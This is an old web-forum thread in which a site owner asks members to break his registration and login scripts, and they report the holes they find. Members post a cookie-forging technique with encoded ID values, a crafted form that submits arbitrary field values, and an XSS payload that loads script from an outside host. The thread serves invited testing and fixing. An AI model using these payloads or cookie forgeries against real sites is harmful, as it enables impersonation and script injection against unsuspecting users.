Break This Script!


Tree

Break This Script! [+rep]

Bored?

Go to http://www.vestieo.com and see if you can break that script (or just fool it).

If you want something else to do, go to http://www.vestieo.com/manage and try to break that login script.

I'm trying to make this thing idiot proof, so do your worst

To register more than once, just hit the "Kill Cookie" button at the bottom.

If you do manage to break it, please post below.
 
0
•••
The views expressed on this page by users and staff are their own, not those of NamePros.
I can edit my cookie to change the id and pretend I'm someone else. :P
ID: 1
Country: USA
IP: 24.99.249.87
Age: 43
Gender: male
Date Created: 2006-02-24

It's also possible to create your own form and make up different genders:
ID: 56
Country: USA
IP: 24.161.93.195
Age: 100
Gender: Jim Has No Gender!
Date Created: 2006-02-25
 
0
•••
Jim_ said:
I can edit my cookie to change the id and pretend I'm someone else. :P
ID: 1
Country: USA
IP: 24.99.249.87
Age: 43
Gender: male
Date Created: 2006-02-24

It's also possible to create your own form and make up different genders:
ID: 56
Country: USA
IP: 24.161.93.195
Age: 100
Gender: Jim Has No Gender!
Date Created: 2006-02-25
:lol:

Good work. But I hope you have a gender.

;)

-Steve
 
0
•••
k, I'll fix the ID thing, but how did you change the gender?

Jim_ said:
I can edit my cookie to change the id and pretend I'm someone else. :P
ID: 1
Country: USA
IP: 24.99.249.87
Age: 43
Gender: male
Date Created: 2006-02-24

It's also possible to create your own form and make up different genders:
ID: 56
Country: USA
IP: 24.161.93.195
Age: 100
Gender: Jim Has No Gender!
Date Created: 2006-02-25
 
0
•••
Code:
<form action="http://www.vestieo.com/?" method="POST">
Age: <input type="text" name="age"><br>
Gender: 
<select name="gender">
	<option value="Jim Has No Gender!">lol. Pants.</option>
	<option value="Male">Male</option>
	<option value="Female">Female</option>
</select><br>
<input type="submit" name="Thank you!"><br>
<input type="hidden" name="done" value="yep">
</form>
Like that.

You might want to put a check in to make sure they choose male or female.
Also, make sure that the age they enter is greater than 0. :)
 
0
•••
Alright, some of the issues have been fixed. Try again!

FYI, I wiped the DB.

Edit: Nevermind, there's still a lot of problems. Let me work on it real quick.
 
0
•••
If I type in <?php it says error, headers already sent.
 
0
•••
XSS vulnerability.
enter this for age: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
 
0
•••
Age is limited to 2 characters now.

Everything is fixed and there should be no security holes.

Jim, not sure what you meant by "XSS vulnerability."
 
0
•••
Tree said:
Age is limited to 2 characters now.

What about that 129-year-old in China?
 
0
•••
Eeerm,
Not sure if it's really effective now.
But I can change my cookie using the following code:

"javascript:void(document.cookie="1337h4x0r0fd00m");alert(document.cookie)"

Meh, it's useless I know.
 
0
•••
Alright, so we've shut this script up. Thanks to everyone who helped, especially Jim!

Now onto the login script!

http://www.vestieo.com/manage

Once again, a huge thank you to everyone who has helped thus far.
 
0
•••
So far, the login page seems safe.

Oh. I can still cheat the cookies. Just have to base64 encode it twice. :)
TVRJPQ%3D%3D is id 12
TVRNPQ%3D%3D is id 13

You might want to generate a random passkey for each id instead.
ex: $password = md5($id . rand(10000,99999));
and then pull the id with the passkey that matches the cookie.
 
0
•••
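An added example (not code from the thread or from the site being tested) showing why the double-base64 cookie described above is forgeable, next to the server-side token lookup the post suggests. It swaps `md5`/`rand` for `random_bytes`, and the function names and the in-memory `$sessions` array standing in for the database are assumptions.

```php
<?php
// Added example. Function names and the $sessions store are hypothetical.

// Weak scheme from the thread: cookie = urlencode(base64(base64(id))).
// Encoding is not secrecy: anyone can decode it or build one for another id.
function decode_legacy_cookie(string $cookie): ?int
{
    $inner = base64_decode(rawurldecode($cookie), true);
    $id = ($inner === false) ? false : base64_decode($inner, true);
    return ($id !== false && preg_match('/\A\d+\z/', $id)) ? (int) $id : null;
}

function encode_legacy_cookie(int $id): string
{
    return rawurlencode(base64_encode(base64_encode((string) $id)));
}

// Hardened scheme: the cookie holds only an unguessable random token.
// The id never leaves the server, so there is nothing to edit client-side.
function issue_token(array &$sessions, int $id): string
{
    $token = bin2hex(random_bytes(32));        // 256 bits from the OS CSPRNG
    $sessions[hash('sha256', $token)] = $id;   // keep only a hash at rest
    return $token;
}

function lookup_token(array $sessions, string $token): ?int
{
    // Reject anything that is not the exact shape we issue.
    if (!preg_match('/\A[0-9a-f]{64}\z/', $token)) {
        return null;
    }
    return $sessions[hash('sha256', $token)] ?? null;
}

// Constructed demo values; the two cookie strings are the ones quoted above.
var_dump(decode_legacy_cookie('TVRJPQ%3D%3D'));             // cookie for id 12
var_dump(encode_legacy_cookie(13) === 'TVRNPQ%3D%3D');      // rebuilt for id 13

$sessions = [];
$token = issue_token($sessions, 12);
var_dump(lookup_token($sessions, $token));                  // the issued token
var_dump(lookup_token($sessions, encode_legacy_cookie(1))); // an edited cookie
var_dump(lookup_token($sessions, str_repeat('0', 64)));     // a guessed token
```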
Alright, this is for the first or second script?
 
0
•••
I can still cheat the cookies on the first script.
 
0
•••
Workin on it.

Fixed

Try it now.

Oh, and Jim, thanks tons! I used that exact little piece of code and it works great!
 
0
•••
Hi,
I've had a go at the Login one, and I can't seem to find any exploits of vulnerabilities, so either your script is somewhat secure, or I'm not good enough to find an exploit.

Yours faithfully,
Steve
 
0
•••
If you have the id and the password in cookies, I don't think it can be broken.. unless they know your password.
 
0
•••
Alright, great!

I will change the encoding on the cookies though. Before it was just base64_encoded twice. I'll change it to md5.

Thanks everyone!
 
0
•••